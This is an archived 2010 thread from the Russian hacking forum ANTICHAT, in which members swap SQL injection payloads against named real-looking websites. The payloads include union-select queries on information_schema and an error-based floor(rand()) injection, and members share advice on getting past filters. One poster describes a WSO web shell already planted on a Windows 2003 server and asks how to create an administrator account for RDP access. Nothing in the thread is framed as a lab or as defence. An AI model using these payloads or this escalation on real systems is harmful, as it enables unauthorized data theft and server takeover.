ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
19.09.2010, 16:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
3507
Репутация:
0
|
|
Сообщение от 547
547 said:
как узнать список таблиц из определенной бд?
я пробовал чтото вроде этого
http://www.ччч.ru/news.php?id=-45+union+select+1,2,3,4,5,unhex%28hex%28group_conc at%28table_name%29%29%29,7,8,9,10+from+information _schema.schemata+where+schema_name=0x00000000
невыйшло..
from+information_schema.tables+where+table_schema= 0x000
|
|
|
|
19.09.2010, 16:57
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
547
1) кавычки хексить/чарить не надо;
2) если бока, то тащи с INFORMATION_SCHEMA.COLUMNS->TABLE_NAME
или Mysql->columns_priv-> Table_name если возможно.
|
|
|
19.09.2010, 20:20
|
|
Новичок
Регистрация: 26.04.2026
Сообщений: 0
Провел на форуме:
0
Репутация:
0
|
|
SELECT title FROM leader_page_titles WHERE '/news.php?newsid=тут иньекция' LIKE CONCAT('%',url,'%')
как раскрутить?
|
|
|
|
19.09.2010, 21:18
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от Strilo4ka
Strilo4ka said:
Код:
Code:
http://www.skunk2.com/news2.php?news_id=43%20or%20%28select%20count%28*%29%20from%20%28select%201%20union%20select%202%20union%20select%203%29x%20group%20by%20concat%28version%28%29,floor%28rand%280%29*2%29%29%29--
4.1.221 эфект тот же....
|
|
|
|
19.09.2010, 21:31
|
|
Познающий
Регистрация: 14.01.2009
Сообщений: 93
Провел на форуме:
244235
Репутация:
39
|
|
если с
/display.php?selected=322' выдается ошибка Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in ..., но 323-1, любые комментарии, в т.ч. /**/ выдают ошибку, selected=(select 322) тоже, о чем это может говорить? смущает то, что если бы софтина была написана правильно, ошибки бы не было, но не могу понять, какое фильтрование используется...
|
|
|
|
19.09.2010, 21:47
|
|
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
Провел на форуме:
818095
Репутация:
34
|
|
Сообщение от roddik
roddik said:
если с
/display.php?selected=322' выдается ошибка Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in ..., но 323-1, любые комментарии, в т.ч. /**/ выдают ошибку, selected=(select 322) тоже, о чем это может говорить? смущает то, что если бы софтина была написана правильно, ошибки бы не было, но не могу понять, какое фильтрование используется...
Так сложно сказать.. кидай в личку сылку если хочешь.. надо смотреть..
|
|
|
|
19.09.2010, 22:48
|
|
Новичок
Регистрация: 26.04.2026
Сообщений: 0
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от Strilo4ka
Strilo4ka said:
интересно
SELECT title FROM leader_page_titles WHERE '/news.php?newsid=тут иньекция'='1' and union select 1/*
SELECT title FROM leader_page_titles WHERE '/news.php?newsid=тут иньекция'='1' and union select 1--
SELECT title FROM leader_page_titles WHERE '/news.php?newsid=тут иньекция'='1' and union select 1#
Это всё уже попробовал,не катит. Пишет
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and+union+select+1/*' LIKE CONCAT('%',url,'%')' at line 1
|
|
|
|
19.09.2010, 22:50
|
|
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
Провел на форуме:
818095
Репутация:
34
|
|
Сообщение от Darth Padla
Darth Padla said:
Это всё уже попробовал,не катит. Пишет
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and+union+select+1/*' LIKE CONCAT('%',url,'%')' at line 1
ну могу тебе сказать тока как и предыдущему человеку кидай сыль в личку... ему ответ кинул надеюсь поможет ... если смогу и тебе помогу..
|
|
|
|
20.09.2010, 01:54
|
|
Новичок
Регистрация: 26.04.2026
Сообщений: 0
Провел на форуме:
0
Репутация:
0
|
|
А почему в личку?мне не жалко,просто из принципа раскрутить хочется.
view-source:http://znakomye.ru/news.php?дальше скуля
|
|
|
|
20.09.2010, 08:58
|
|
Познающий
Регистрация: 25.10.2007
Сообщений: 46
Провел на форуме:
318186
Репутация:
2
|
|
Народ, такой вопрос.
Вообщем залил шел wso2 на win2k3 имею полный доступ ко всему что находится на винте.
Как через шелл создать юзера и добавить его в группу админов что бы я мог зайти на RDP ?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
